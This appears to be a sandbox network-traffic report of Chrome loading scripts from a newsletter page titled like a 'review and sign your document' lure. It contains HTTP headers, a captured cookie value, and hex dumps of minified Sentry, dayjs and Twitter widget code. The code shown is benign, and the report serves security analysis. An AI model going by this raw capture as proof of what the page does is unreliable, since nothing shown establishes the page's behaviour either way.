                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1149
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"47d-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89a7f08c347-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 39 35 65 64 32 39 33 2d 65 35 66 34 2d 35 39 31 65 2d 39 64 38 37 2d 37 64 61 37 31 31 63 62 36 39 36 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d95ed293-e5f4-591e-9d87-7da711cb696c")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC692INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 22 22 2c 72 3d 30 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 6e 26 26 28 74 3d 6f 28 74 2c 61 28 6e 29 29 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 20 74 3b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 22 22 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72
                                                                                                                                            Data Ascii: function(){var f={}.hasOwnProperty;function s(){for(var t="",r=0;r<arguments.length;r++){var n=arguments[r];n&&(t=o(t,a(n)))}return t}function a(t){if(typeof t=="string"||typeof t=="number")return t;if(typeof t!="object")return"";if(Array.isArray(t))retur


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            21192.168.2.1649733104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC554OUTGET /assets/dayjs.min-B8CfgAhU.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC898INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 7502
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1d4e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89aab7a0f43-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC471INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 37 35 39 39 62 38 63 2d 66 62 31 36 2d 35 64 34 36 2d 38 35 66 32 2d 38 38 35 31 39 63 61 62 66 38 30 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="77599b8c-fb16-5d46-85f2-88519cabf801")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 22 6d 69 6e 75 74 65 22 2c 4f 3d 22 68 6f 75 72 22 2c 4d 3d 22 64 61 79 22 2c 48 3d 22 77 65 65 6b 22 2c 6d 3d 22 6d 6f 6e 74 68 22 2c 4a 3d 22 71 75 61 72 74 65 72 22 2c 79 3d 22 79 65 61 72 22 2c 5f 3d 22 64 61 74 65 22 2c 5a 3d 22 49 6e 76 61 6c 69 64 20 44 61 74 65 22 2c 42 3d 2f 5e 28 5c 64 7b 34 7d 29 5b 2d 2f 5d 3f 28 5c 64 7b 31 2c 32 7d 29 3f 5b 2d 2f 5d 3f 28 5c 64 7b 30 2c 32 7d 29 5b 54 74 5c 73 5d 2a 28 5c 64 7b 31 2c 32 7d 29 3f 3a 3f 28 5c 64 7b 31 2c 32 7d 29 3f 3a 3f 28 5c 64 7b 31 2c 32 7d 29 3f 5b 2e 3a 5d 3f 28 5c 64 2b 29 3f 24 2f 2c 47 3d 2f 5c 5b 28 5b 5e 5c 5d 5d 2b 29 5d 7c 59 7b 31 2c 34 7d 7c 4d 7b 31 2c 34 7d 7c 44 7b 31 2c 32 7d 7c 64 7b 31 2c 34 7d 7c 48 7b 31 2c 32 7d 7c 68 7b 31 2c 32 7d 7c 61 7c 41 7c 6d 7b 31 2c 32 7d 7c
                                                                                                                                            Data Ascii: "minute",O="hour",M="day",H="week",m="month",J="quarter",y="year",_="date",Z="Invalid Date",B=/^(\d{4})[-/]?(\d{1,2})?[-/]?(\d{0,2})[Tt\s]*(\d{1,2})?:?(\d{1,2})?:?(\d{1,2})?[.:]?(\d+)?$/,G=/\[([^\]]+)]|Y{1,4}|M{1,4}|D{1,2}|d{1,4}|H{1,2}|h{1,2}|a|A|m{1,2}|
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 61 73 65 28 29 3b 44 5b 69 5d 26 26 28 65 3d 69 29 2c 74 26 26 28 44 5b 69 5d 3d 74 2c 65 3d 69 29 3b 76 61 72 20 75 3d 6e 2e 73 70 6c 69 74 28 22 2d 22 29 3b 69 66 28 21 65 26 26 75 2e 6c 65 6e 67 74 68 3e 31 29 72 65 74 75 72 6e 20 73 28 75 5b 30 5d 29 7d 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 2e 6e 61 6d 65 3b 44 5b 6f 5d 3d 6e 2c 65 3d 6f 7d 72 65 74 75 72 6e 21 72 26 26 65 26 26 28 6b 3d 65 29 2c 65 7c 7c 21 72 26 26 6b 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 6e 29 7b 69 66 28 46 28 73 29 29 72 65 74 75 72 6e 20 73 2e 63 6c 6f 6e 65 28 29 3b 76 61 72 20 74 3d 74 79 70 65 6f 66 20 6e 3d 3d 22 6f 62 6a 65 63 74 22 3f 6e 3a 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 64 61 74 65 3d 73 2c 74 2e 61 72 67 73 3d 61 72 67 75 6d 65 6e 74 73 2c 6e 65 77 20 43 28 74
                                                                                                                                            Data Ascii: ase();D[i]&&(e=i),t&&(D[i]=t,e=i);var u=n.split("-");if(!e&&u.length>1)return s(u[0])}else{var o=n.name;D[o]=n,e=o}return!r&&e&&(k=e),e||!r&&k},f=function(s,n){if(F(s))return s.clone();var t=typeof n=="object"?n:{};return t.date=s,t.args=arguments,new C(t
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6e 20 74 68 69 73 2e 65 6e 64 4f 66 28 72 29 3c 66 28 74 29 7d 2c 6e 2e 24 67 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 72 65 74 75 72 6e 20 61 2e 75 28 74 29 3f 74 68 69 73 5b 72 5d 3a 74 68 69 73 2e 73 65 74 28 65 2c 74 29 7d 2c 6e 2e 75 6e 69 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 76 61 6c 75 65 4f 66 28 29 2f 31 65 33 29 7d 2c 6e 2e 76 61 6c 75 65 4f 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 64 2e 67 65 74 54 69 6d 65 28 29 7d 2c 6e 2e 73 74 61 72 74 4f 66 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 69 3d 21 21 61 2e 75 28 72 29 7c 7c 72 2c 75 3d 61 2e 70 28 74 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 70 2c
                                                                                                                                            Data Ascii: n this.endOf(r)<f(t)},n.$g=function(t,r,e){return a.u(t)?this[r]:this.set(e,t)},n.unix=function(){return Math.floor(this.valueOf()/1e3)},n.valueOf=function(){return this.$d.getTime()},n.startOf=function(t,r){var e=this,i=!!a.u(r)||r,u=a.p(t),o=function(p,
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 65 2c 69 3d 74 68 69 73 3b 74 3d 4e 75 6d 62 65 72 28 74 29 3b 76 61 72 20 75 3d 61 2e 70 28 72 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 6c 3d 66 28 69 29 3b 72 65 74 75 72 6e 20 61 2e 77 28 6c 2e 64 61 74 65 28 6c 2e 64 61 74 65 28 29 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 64 2a 74 29 29 2c 69 29 7d 3b 69 66 28 75 3d 3d 3d 6d 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 28 6d 2c 74 68 69 73 2e 24 4d 2b 74 29 3b 69 66 28 75 3d 3d 3d 79 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 28 79 2c 74 68 69 73 2e 24 79 2b 74 29 3b 69 66 28 75 3d 3d 3d 4d 29 72 65 74 75 72 6e 20 6f 28 31 29 3b 69 66 28 75 3d 3d 3d 48 29 72 65 74 75 72 6e 20 6f 28 37 29 3b 76 61 72 20 63 3d 28 65 3d 7b 7d 2c
                                                                                                                                            Data Ascii: function(t,r){var e,i=this;t=Number(t);var u=a.p(r),o=function(d){var l=f(i);return a.w(l.date(l.date()+Math.round(d*t)),i)};if(u===m)return this.set(m,this.$M+t);if(u===y)return this.set(y,this.$y+t);if(u===M)return o(1);if(u===H)return o(7);var c=(e={},
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 28 63 29 3b 63 61 73 65 22 6d 6d 22 3a 72 65 74 75 72 6e 20 61 2e 73 28 63 2c 32 2c 22 30 22 29 3b 63 61 73 65 22 73 22 3a 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 72 2e 24 73 29 3b 63 61 73 65 22 73 73 22 3a 72 65 74 75 72 6e 20 61 2e 73 28 72 2e 24 73 2c 32 2c 22 30 22 29 3b 63 61 73 65 22 53 53 53 22 3a 72 65 74 75 72 6e 20 61 2e 73 28 72 2e 24 6d 73 2c 33 2c 22 30 22 29 3b 63 61 73 65 22 5a 22 3a 72 65 74 75 72 6e 20 75 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 24 29 7c 7c 75 2e 72 65 70 6c 61 63 65 28 22 3a 22 2c 22 22 29 7d 29 7d 2c 6e 2e 75 74 63 4f 66 66 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 31 35 2a 2d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 24 64 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 2f
                                                                                                                                            Data Ascii: (c);case"mm":return a.s(c,2,"0");case"s":return String(r.$s);case"ss":return a.s(r.$s,2,"0");case"SSS":return a.s(r.$ms,3,"0");case"Z":return u}return null}($)||u.replace(":","")})},n.utcOffset=function(){return 15*-Math.round(this.$d.getTimezoneOffset()/
                                                                                                                                            2025-01-15 18:14:33 UTC186INData Raw: 3d 44 5b 6b 5d 2c 66 2e 4c 73 3d 44 2c 66 2e 70 3d 7b 7d 2c 66 7d 29 7d 28 4e 29 29 2c 4e 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 74 74 3d 58 28 29 3b 63 6f 6e 73 74 20 72 74 3d 4b 28 74 74 29 3b 65 78 70 6f 72 74 7b 72 74 20 61 73 20 64 2c 58 20 61 73 20 72 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 37 37 35 39 39 62 38 63 2d 66 62 31 36 2d 35 64 34 36 2d 38 35 66 32 2d 38 38 35 31 39 63 61 62 66 38 30 31 0a
                                                                                                                                            Data Ascii: =D[k],f.Ls=D,f.p={},f})}(N)),N.exports}var tt=X();const rt=K(tt);export{rt as d,X as r};//# sourceMappingURL=dayjs.min-B8CfgAhU.js.map//# debugId=77599b8c-fb16-5d46-85f2-88519cabf801


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            22192.168.2.1649723146.75.120.1574436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC549OUTGET /widgets.js HTTP/1.1
                                                                                                                                            Host: platform.twitter.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:33 UTC615INHTTP/1.1 200 OK
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 93065
                                                                                                                                            Last-Modified: Mon, 11 Dec 2023 17:20:28 GMT
                                                                                                                                            ETag: "824beb891744db98ccbd3a456e59e0f7"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            Cache-Control: public, max-age=1800
                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            X-Served-By: cache-iad-kcgs7200137-IAD, cache-fra-etou8220074-FRA
                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            TW-CDN: FT
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 46 75 6e 63 74 69 6f 6e 26 26 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 26 26 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 62 69 6e 64 26 26 28 2f 28 4d 53 49 45 20 28 5b 36 37 38 39 5d 7c 31 30 7c 31 31 29 29 7c 54 72 69 64 65 6e 74 2f 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7c 7c 28 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74 72 26 26 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74 72 2e 77 69 64 67 65 74 73 26 26 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74 72 2e 77 69 64 67 65 74 73 2e 6c 6f 61 64 65 64 26 26 77 69 6e 64 6f 77 2e 74 77 74 74 72 2e 77 69 64 67 65 74 73 2e 6c 6f 61 64 26 26 77 69 6e 64 6f 77 2e 74 77 74 74 72 2e 77 69 64 67 65 74 73 2e 6c 6f 61 64 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 74 77 74 74
                                                                                                                                            Data Ascii: Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||(window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.loaded&&window.twttr.widgets.load&&window.twttr.widgets.load(),window.__twtt
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 5b 74 5d 3b 69 66 28 30 21 3d 3d 6e 29 7b 69 66 28 6e 29 7b 76 61 72 20 69 3d 65 26 26 28 22 6c 6f 61 64 22 3d 3d 3d 65 2e 74 79 70 65 3f 22 6d 69 73 73 69 6e 67 22 3a 65 2e 74 79 70 65 29 2c 6f 3d 65 26 26 65 2e 74 61 72 67 65 74 26 26 65 2e 74 61 72 67 65 74 2e 73 72 63 2c 73 3d 6e 65 77 20 45 72 72 6f 72 28 22 4c 6f 61 64 69 6e 67 20 63 68 75 6e 6b 20 22 2b 74 2b 22 20 66 61 69 6c 65 64 2e 5c 6e 28 22 2b 69 2b 22 3a 20 22 2b 6f 2b 22 29 22 29 3b 73 2e 74 79 70 65 3d 69 2c 73 2e 72 65 71 75 65 73 74 3d 6f 2c 6e 5b 31 5d 28 73 29 7d 72 5b 74 5d 3d 76 6f 69 64 20 30 7d 7d 3b 76 61 72 20 63 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 7b 74 79 70 65 3a 22 74 69 6d 65 6f 75 74 22 2c 74 61 72 67 65 74 3a 75 7d 29 7d 2c 31 32 65
                                                                                                                                            Data Ascii: [t];if(0!==n){if(n){var i=e&&("load"===e.type?"missing":e.type),o=e&&e.target&&e.target.src,s=new Error("Loading chunk "+t+" failed.\n("+i+": "+o+")");s.type=i,s.request=o,n[1](s)}r[t]=void 0}};var c=setTimeout(function(){s({type:"timeout",target:u})},12e
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 2e 6d 61 74 63 68 28 2f 5c 73 28 5b 61 2d 7a 41 2d 5a 5d 2b 29 2f 29 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 4f 62 6a 65 63 74 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 76 61 72 20 65 3b 69 66 28 21 73 28 74 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 4f 62 6a 65 63 74 2e 6b 65 79 73 29 72 65 74 75 72 6e 21 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 65 20 69 6e 20 74 29 69 66 28 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 29 72 65 74 75 72 6e 21 31 3b 72
                                                                                                                                            Data Ascii: [n]);return t}function o(t){return{}.toString.call(t).match(/\s([a-zA-Z]+)/)[1].toLowerCase()}function s(t){return t===Object(t)}function a(t){var e;if(!s(t))return!1;if(Object.keys)return!Object.keys(t).length;for(e in t)if(t.hasOwnProperty(e))return!1;r
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 77 5c 2e 29 3f 74 77 69 74 74 65 72 5c 2e 63 6f 6d 5c 2f 28 5c 77 2b 29 5c 2f 28 3f 3a 6c 69 6b 65 73 7c 66 61 76 6f 72 69 74 65 73 29 2f 69 2c 68 3d 2f 5e 68 74 74 70 73 3f 3a 5c 2f 5c 2f 28 3f 3a 77 77 77 5c 2e 29 3f 74 77 69 74 74 65 72 5c 2e 63 6f 6d 5c 2f 28 5c 77 2b 29 5c 2f 6c 69 73 74 73 5c 2f 28 5b 5c 77 2d 25 5d 2b 29 2f 69 2c 70 3d 2f 5e 68 74 74 70 73 3f 3a 5c 2f 5c 2f 28 3f 3a 77 77 77 5c 2e 29 3f 74 77 69 74 74 65 72 5c 2e 63 6f 6d 5c 2f 69 5c 2f 6c 69 76 65 5c 2f 28 5c 64 2b 29 2f 69 2c 6d 3d 2f 5e 68 74 74 70 73 3f 3a 5c 2f 5c 2f 73 79 6e 64 69 63 61 74 69 6f 6e 5c 2e 74 77 69 74 74 65 72 5c 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 2f 69 2c 76 3d 2f 5e 68 74 74 70 73 3f 3a 5c 2f 5c 2f 28 6c 6f 63 61 6c 68 6f 73 74 7c 70 6c 61 74 66 6f 72
                                                                                                                                            Data Ascii: w\.)?twitter\.com\/(\w+)\/(?:likes|favorites)/i,h=/^https?:\/\/(?:www\.)?twitter\.com\/(\w+)\/lists\/([\w-%]+)/i,p=/^https?:\/\/(?:www\.)?twitter\.com\/i\/live\/(\d+)/i,m=/^https?:\/\/syndication\.twitter\.com\/settings/i,v=/^https?:\/\/(localhost|platfor
                                                                                                                                            2025-01-15 18:14:33 UTC1378INData Raw: 6e 28 74 29 7b 72 65 74 75 72 6e 20 63 2e 74 65 73 74 28 74 29 26 26 52 65 67 45 78 70 2e 24 31 7d 2c 6c 69 6b 65 73 53 63 72 65 65 6e 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6c 2e 74 65 73 74 28 74 29 26 26 52 65 67 45 78 70 2e 24 31 7d 2c 6c 69 73 74 53 63 72 65 65 6e 4e 61 6d 65 41 6e 64 53 6c 75 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 2c 72 3b 69 66 28 68 2e 74 65 73 74 28 74 29 29 7b 65 3d 52 65 67 45 78 70 2e 24 31 2c 6e 3d 52 65 67 45 78 70 2e 24 32 3b 74 72 79 7b 72 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 7b 6f 77 6e 65 72 53 63 72 65 65 6e 4e 61 6d 65 3a 65 2c 73 6c 75 67 3a 72 7c 7c 6e 7d 7d 72 65 74 75 72 6e 21 31
                                                                                                                                            Data Ascii: n(t){return c.test(t)&&RegExp.$1},likesScreenName:function(t){return l.test(t)&&RegExp.$1},listScreenNameAndSlug:function(t){var e,n,r;if(h.test(t)){e=RegExp.$1,n=RegExp.$2;try{r=decodeURIComponent(n)}catch(t){}return{ownerScreenName:e,slug:r||n}}return!1
